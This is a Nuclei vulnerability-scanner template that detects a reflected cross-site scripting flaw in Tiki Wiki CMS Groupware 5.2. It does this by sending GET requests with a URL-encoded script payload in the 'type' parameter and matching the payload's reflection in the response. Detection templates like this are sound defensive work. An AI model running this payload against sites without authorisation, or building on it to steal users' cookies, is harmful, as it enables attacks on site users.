nuclei-templates/vulnerabilities/other/tikiwiki-reflected-xss.yaml

38 lines
1.3 KiB
YAML

id: tikiwiki-reflected-xss
info:
name: Tiki Wiki CMS Groupware 5.2 - Cross-Site Scripting
author: madrobot
severity: high
description: Tiki Wiki CMS Groupware 5.2 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://packetstormsecurity.com/files/94255/Tiki-Wiki-CMS-Groupware-5.2-Cross-Site-Scripting.html
- https://www.exploit-db.com/exploits/15174
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: packetstorm,edb,xss,tikiwiki
requests:
- method: GET
path:
- "{{BaseURL}}/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"
- "{{BaseURL}}/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(31337)</script>"
part: body
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/09/23